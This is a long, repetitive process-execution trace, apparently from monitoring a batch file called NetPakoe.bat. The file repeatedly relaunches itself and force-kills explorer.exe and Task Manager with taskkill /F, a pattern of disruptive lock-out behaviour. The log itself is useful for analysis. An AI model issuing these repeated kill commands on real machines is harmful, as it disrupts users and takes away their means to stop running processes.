C:\Windows\system32\cmd.exe /K NetPakoe
C:\Windows\explorer.exe
explorer
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe.bat
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe
C:\Windows\explorer.exe
explorer
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe.bat
C:\Windows\explorer.exe
explorer
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\explorer.exe
explorer
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe.bat
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe
C:\Windows\explorer.exe
explorer
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe.bat
C:\Windows\explorer.exe
explorer
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe.bat
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe
C:\Windows\explorer.exe
explorer
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe.bat
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe
C:\Windows\explorer.exe
explorer
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\explorer.exe
explorer
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\explorer.exe
explorer
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe.bat
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe.bat
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\explorer.exe
explorer
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe
C:\Windows\explorer.exe
explorer
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe.bat
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe.bat
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe
C:\Windows\explorer.exe
explorer
C:\Windows\explorer.exe
explorer
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe.bat
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe.bat
C:\Windows\explorer.exe
explorer
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe.bat
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe
C:\Windows\explorer.exe
explorer
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe.bat
C:\Windows\explorer.exe
explorer
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe
C:\Windows\explorer.exe
explorer
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe.bat
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe.bat
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe.bat
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\explorer.exe
explorer
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe.bat
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe.bat
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe.bat
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe.bat
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe.bat
C:\Windows\explorer.exe
explorer
C:\Windows\explorer.exe
explorer
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe.bat
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe.bat
C:\Windows\explorer.exe
explorer
C:\Windows\explorer.exe
explorer
C:\Windows\explorer.exe
explorer
C:\Windows\explorer.exe
explorer
C:\Windows\explorer.exe
explorer
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe.bat
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe.bat
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe.bat
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe.bat
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe.bat
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe.bat
C:\Windows\explorer.exe
explorer
C:\Windows\explorer.exe
explorer
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe.bat
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe.bat
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\explorer.exe
explorer
C:\Windows\explorer.exe
explorer
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\explorer.exe
explorer
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\explorer.exe
explorer
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe
C:\Windows\explorer.exe
explorer
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\explorer.exe
explorer
C:\Windows\explorer.exe
explorer
C:\Windows\explorer.exe
explorer
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe.bat
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe.bat
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe
C:\Windows\explorer.exe
explorer
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe.bat
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe
C:\Windows\explorer.exe
explorer
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\explorer.exe
explorer
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe.bat
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe.bat
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe.bat
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\explorer.exe
explorer
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\explorer.exe
explorer
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\explorer.exe
explorer
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe.bat
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe.bat
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe.bat
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\explorer.exe
explorer
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe.bat
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe.bat
C:\Windows\explorer.exe
explorer
C:\Windows\explorer.exe
explorer
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe.bat
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe.bat
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe
C:\Windows\explorer.exe
explorer
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe.bat
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe
C:\Windows\explorer.exe
explorer
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe.bat
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\explorer.exe
explorer
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe.bat
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe.bat
C:\Windows\explorer.exe
explorer
C:\Windows\explorer.exe
explorer
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe.bat
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe.bat
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe.bat
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\explorer.exe
explorer
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe.bat
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe.bat
C:\Windows\explorer.exe
explorer
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe.bat
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe.bat
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe.bat
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe
C:\Windows\explorer.exe
explorer
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe.bat
C:\Windows\explorer.exe
explorer
C:\Windows\explorer.exe
explorer
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe.bat
C:\Windows\explorer.exe
explorer
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe.bat
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe.bat
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe.bat
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe.bat
C:\Windows\explorer.exe
explorer
C:\Windows\explorer.exe
explorer
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe.bat
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe.bat
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe
C:\Windows\explorer.exe
explorer
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe.bat
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe.bat
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe.bat
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe.bat
C:\Windows\explorer.exe
explorer
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe.bat
C:\Windows\explorer.exe
explorer
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe.bat
C:\Windows\explorer.exe
explorer
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe
C:\Windows\explorer.exe
explorer
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe.bat
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe.bat
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe
C:\Windows\explorer.exe
explorer
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe
C:\Windows\explorer.exe
explorer
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\explorer.exe
explorer
C:\Windows\explorer.exe
explorer
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe.bat
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe.bat
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\explorer.exe
explorer
C:\Windows\explorer.exe
explorer
C:\Windows\explorer.exe
explorer
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\explorer.exe
explorer
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
